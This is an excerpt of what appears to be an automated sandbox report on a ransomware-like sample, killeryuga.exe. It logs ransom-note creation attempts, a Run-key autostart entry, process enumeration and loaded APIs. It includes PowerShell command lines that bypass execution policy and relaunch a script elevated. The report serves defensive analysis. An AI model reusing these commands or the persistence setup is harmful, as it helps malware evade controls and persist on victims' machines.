Data
Read Response size = 65636, size_out = 3464 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 65573 True 1
Fn
Data
Read Response size = 65636, size_out = 65564 True 1
Fn
Data
Read Response size = 65636, size_out = 65596 True 1
Fn
Data
Read Response size = 65636, size_out = 65604 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 65572 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 4808 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 65572 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 65550 True 1
Fn
Data
Read Response size = 65636, size_out = 11020 True 1
Fn
Data
Read Response size = 65636, size_out = 65564 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 2
Fn
Data
Read Response size = 65636, size_out = 29851 True 1
Fn
Data
Read Response size = 65636, size_out = 0 True 1
Fn
Close Session - True 1
Fn
Process #13: powershell.exe
Information Value
ID #13
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\
Monitor Start Time: 00:01:03, Reason: Child Process
Unmonitor End Time: 00:01:17, Reason: Self Terminated
Monitor Duration 00:00:14
Remark No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0xa4c
Parent PID 0xa0c (c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0xA50, 0xA94, 0xA98, 0xA9C, 0xAA0, 0xAA4
Process #14: powershell.exe
Information Value
ID #14
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line powershell -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File ""C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1""' -Verb RunAs}"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\
Monitor Start Time: 00:01:15, Reason: Child Process
Unmonitor End Time: 00:01:17, Reason: Self Terminated
Monitor Duration 00:00:01
Remark No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0xb04
Parent PID 0xa0c (c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0xB10, 0xB08
Process #16: killeryuga.exe
Information Value
ID #16
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:56, Reason: Autostart
Unmonitor End Time: 00:03:19, Reason: Self Terminated
Monitor Duration 00:00:23
OS Process Information
Information Value
PID 0x780
Parent PID 0x6f8 (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0x784, 0x7CC, 0x4BC, 0x4F0, 0x4F4, 0x4A8, 0x4B0, 0x494, 0x498, 0x4B4, 0x4E8, 0x5B0
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
killeryuga.exe 0x00400000 0x007CCFFF Marked Writable - 32-bit - False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00407C6C, 0x004035D8 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004068AB False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041551E False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00404045 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00414D7D False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00408F6D False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040E452 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041D8B9, 0x0040BC4A False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040AA58 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00405A42 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040943F False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00424067, 0x0041F26F, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00418238, 0x0040F68F False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00402D3E, 0x00417990 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00401DB0 False
buffer 0x00904260 0x00943193 Marked Executable - 32-bit - False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00423043 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041C317 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041B267 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041E4C3 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042CE51 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042D244 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004281E0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00422D24 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004207EE False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043D44C, 0x00439A27, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00429D19, 0x00438910, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004400B4 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00411BE0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00412360 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00421FDE, 0x0040D690, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041A448 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042A000 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004135F0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040C4E0 False
Host Behavior
File (12)
Operation Filename Additional Information Success Count Logfile
Create C:\Config.Msi\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE False 1
Fn
Create C:\Recovery\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE False 1
Fn
Create C:\System Volume Information\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE False 1
Fn
Create C:\Boot\BCD.LOG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Write - size = 48 False 1
Fn
Write - size = 2 False 1
Fn
Registry (2)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart, type = REG_EXPAND_SZ True 1
Fn
Process (190)
Operation Process Additional Information Success Count Logfile
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe os_pid = 0x588, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe os_pid = 0x5a4, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Enumerate Processes - - True 1
Fn
Open System desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\smss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\wininit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\winlogon.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsass.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\conhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\audiodg.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\spoolsv.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\sppsvc.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\userinit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\explorer.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\dwm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\adobe\reader 10.0\reader\reader_sl.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 29
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 57
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 54
Fn
Module (555)
Operation Module Additional Information Success Count Logfile
Load KERNEL32.DLL base_address = 0x75350000 True 1
Fn
Load ADVAPI32.dll base_address = 0x76f50000 True 2
Fn
Load GDI32.dll base_address = 0x76a80000 True 1
Fn
Load ole32.dll base_address = 0x75bd0000 True 2
Fn
Load SHELL32.dll base_address = 0x75e30000 True 2
Fn
Load USER32.dll base_address = 0x75470000 True 2
Fn
Load kernel32.dll base_address = 0x75350000 True 2
Fn
Load RPCRT4.dll base_address = 0x759b0000 True 1
Fn
Load MPR.dll base_address = 0x750f0000 True 1
Fn
Load WININET.dll base_address = 0x75d30000 True 1
Fn
Load WINMM.dll base_address = 0x750b0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x77020000 True 1
Fn
Load KERNEL32.dll base_address = 0x75350000 True 1
Fn
Load OLEAUT32.dll base_address = 0x76b50000 True 1
Fn
Load IPHLPAPI.DLL base_address = 0x75090000 True 1
Fn
Load WS2_32.dll base_address = 0x76b10000 True 1
Fn
Load DNSAPI.dll base_address = 0x75030000 True 1
Fn
Load CRYPT32.dll base_address = 0x751a0000 True 1
Fn
Load msvcr100.dll base_address = 0x74f70000 True 1
Fn
Load Psapi.dll base_address = 0x75460000 True 1
Fn
Load Shell32.dll base_address = 0x75e30000 True 44
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75350000 True 16
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 260 True 2
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 1024 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringA, address_out = 0x75363c5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x7536465a True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x7536469b True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x75361410 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x753653c6 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoW, address_out = 0x75363c42 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringW, address_out = 0x75363bca True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesA, address_out = 0x7538287b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoA, address_out = 0x7537d5e5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLCID, address_out = 0x75363da5 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatA, address_out = 0x7538a959 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatA, address_out = 0x7538a842 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x75361946 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeA, address_out = 0x75388266 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFileEx, address_out = 0x753e45ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FatalAppExitA, address_out = 0x753e4691 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FillConsoleOutputAttribute, address_out = 0x754071e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x75361245 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetCommMask, address_out = 0x753e7198 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TransmitCommChar, address_out = 0x753e75fe True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = PrepareTape, address_out = 0x753ed232 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x75361222 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x75361700 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVolumePathNameA, address_out = 0x753ebeed True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsBadWritePtr, address_out = 0x7538d1ec True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextVolumeMountPointA, address_out = 0x753ec189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x7536588e True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnlockFileEx, address_out = 0x7538d594 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x753634b0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryExA, address_out = 0x753d9479 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedDecrement, address_out = 0x753613f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteTapemark, address_out = 0x753ed2d2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeW, address_out = 0x7536418b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetNativeSystemInfo, address_out = 0x753710b5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocale, address_out = 0x7537ce46 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalDeleteAtom, address_out = 0x7537cdad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x753617b9 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringA, address_out = 0x7538bc39 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x7536192e True 2
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x75387aca True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleOutputCP, address_out = 0x75379b0f True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleA, address_out = 0x753612fc True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x753e454f True 2
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x75361916 True 2
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x753649d7 True 2
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedExchange, address_out = 0x75361462 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x753634c8 True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleCtrlHandler, address_out = 0x75368a09 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x75364d40 True 2
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x753658a6 True 2
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x7538d1c3 True 2
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x7537d802 True 3
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x75361809 True 2
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x7538772f True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x753687c9 True 2
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75364a5d True 2
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x775fe026 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x753611c0 True 2
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x753614c9 True 2
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x753610ff True 2
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x75367a10 True 3
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x75361282 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x753651b3 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x753614b1 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x75364950 True 2
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x753651cb True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x753651e3 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x75365223 True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetHandleCount, address_out = 0x7536cb29 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x75363531 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoA, address_out = 0x75360e00 True 1
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x776045f5 True 2
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x753611e0 True 2
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x753649ad True 2
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x753614fb True 2
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x75363587 True 2
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedIncrement, address_out = 0x75361400 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x753611a9 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x75361450 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThread, address_out = 0x753617ec True 2
Get Address c:\windows\syswow64\kernel32.dll function = HeapCreate, address_out = 0x75364a2d True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapDestroy, address_out = 0x753635b7 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x7536186e True 3
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x75361725 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x7536110c True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x753611f8 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x75363509 True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x753617d1 True 2
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x7536170d True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x75407bff True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x75361328 True 2
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x775f22b0 True 2
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x775f2270 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x75365189 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x7536179c True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x7538d1a1 True 2
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x75364493 True 2
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x75361856 True 3
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77611f6e True 2
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77603002 True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableA, address_out = 0x7536e331 True 2
Get Address c:\windows\syswow64\advapi32.dll function = IsValidSecurityDescriptor, address_out = 0x76f5b58c True 1
Get Address c:\windows\syswow64\advapi32.dll function = GetFileSecurityA, address_out = 0x76f919b8 True 1
Get Address c:\windows\syswow64\advapi32.dll function = ImpersonateLoggedOnUser, address_out = 0x76f5c57a True 1
Get Address c:\windows\syswow64\advapi32.dll function = ObjectCloseAuditAlarmW, address_out = 0x76f93389 True 1
Get Address c:\windows\syswow64\advapi32.dll function = CreatePrivateObjectSecurity, address_out = 0x76f79a12 True 1
Get Address c:\windows\syswow64\advapi32.dll function = AreAllAccessesGranted, address_out = 0x76f930a8 True 1
Get Address c:\windows\syswow64\advapi32.dll function = GetAclInformation, address_out = 0x76f5cc89 True 1
Get Address c:\windows\syswow64\advapi32.dll function = AreAnyAccessesGranted, address_out = 0x76f930b8 True 1
Get Address c:\windows\syswow64\gdi32.dll function = SetMetaFileBitsEx, address_out = 0x76aa7121 True 1
Get Address c:\windows\syswow64\gdi32.dll function = CreateDIBPatternBrushPt, address_out = 0x76aab6da True 1
Get Address c:\windows\syswow64\gdi32.dll function = SetWindowExtEx, address_out = 0x76aa1ace True 1
Get Address c:\windows\syswow64\gdi32.dll function = GetMetaFileBitsEx, address_out = 0x76aa6e71 True 1
Get Address c:\windows\syswow64\gdi32.dll function = GetDeviceCaps, address_out = 0x76a94de0 True 1
Get Address c:\windows\syswow64\gdi32.dll function = AngleArc, address_out = 0x76ac4124 True 1
Get Address c:\windows\syswow64\gdi32.dll function = GetDCBrushColor, address_out = 0x76ac232e True 1
Get Address c:\windows\syswow64\gdi32.dll function = FlattenPath, address_out = 0x76ac555d True 1
Get Address c:\windows\syswow64\gdi32.dll function = GetGraphicsMode, address_out = 0x76aa138a True 1
Get Address c:\windows\syswow64\gdi32.dll function = SetDIBits, address_out = 0x76a97590 True 1
Get Address c:\windows\syswow64\gdi32.dll function = CopyEnhMetaFileW, address_out = 0x76acd9dc True 1
Get Address c:\windows\syswow64\gdi32.dll function = Chord, address_out = 0x76ac439f True 1
Get Address c:\windows\syswow64\gdi32.dll function = PlayMetaFile, address_out = 0x76aab2b9 True 1
Get Address c:\windows\syswow64\ole32.dll function = CLSIDFromProgID, address_out = 0x75bf503c True 1
Get Address c:\windows\syswow64\ole32.dll function = OleUninitialize, address_out = 0x75beeba1 True 1
Get Address c:\windows\syswow64\ole32.dll function = OleSetMenuDescriptor, address_out = 0x75c2dc53 True 1
Get Address c:\windows\syswow64\ole32.dll function = OleLoadFromStream, address_out = 0x75bd6143 True 1
Get Address c:\windows\syswow64\ole32.dll function = OleQueryCreateFromData, address_out = 0x75c532d4 True 1
